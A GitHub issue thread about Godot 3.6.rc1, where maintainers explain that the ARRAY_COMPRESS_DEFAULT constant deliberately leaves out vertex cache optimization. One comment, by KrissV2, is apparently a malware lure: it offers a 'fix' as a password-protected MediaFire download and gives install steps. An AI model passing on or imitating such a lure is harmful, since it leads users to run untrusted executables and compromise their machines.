### ISSUE TITLE
[3.6.rc1] ARRAY_COMPRESS_DEFAULT is wrong

### ISSUE THREAD

**Issue by Dadaskis** [godotengine/godot#96366]
### Tested versions

- Reproducible in 3.6.rc1

### System information

Windows 11 - Godot v3.6.rc1 - GLES3 - dedicated

### Issue description

![image](https://github.com/user-attachments/assets/eab8d161-6297-4e17-b3a7-e3e49012975a)

![image](https://github.com/user-attachments/assets/99a7e076-007c-4d4b-a467-48080459d980)

In this case, `ARRAY_COMPRESS_DEFAULT` constant should have different value because `ARRAY_FLAG_USE_VERTEX_CACHE_OPTIMIZATION` is now default.

### Steps to reproduce

Read description

### Minimal reproduction project (MRP)

No need to reproduce

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by clayjohn** [comment]
`ARRAY_COMPRESS_DEFAULT` does not include `ARRAY_FLAG_USE_VERTEX_CACHE_OPTIMIZATION`. 

`ARRAY_COMPRESS_DEFAULT` doesn't relate to the import options, it is just a helpful enum for when using `Mesh.add_surface_from_arrays()`

See the definition here:
https://github.com/godotengine/godot/blob/01c78d87fea331c978d7ba8a2d5edb379564bdde/scene/resources/mesh.h#L103

**Comment by lawnjelly** [comment]
Yes, this is intended.

As @clayjohn points out, `ARRAY_COMPRESS_DEFAULT` are default options for `add_surface_from_arrays()`. Vertex cache optimization may slow down creation, hence it is used (by default) only during import, or when selected manually by the user.
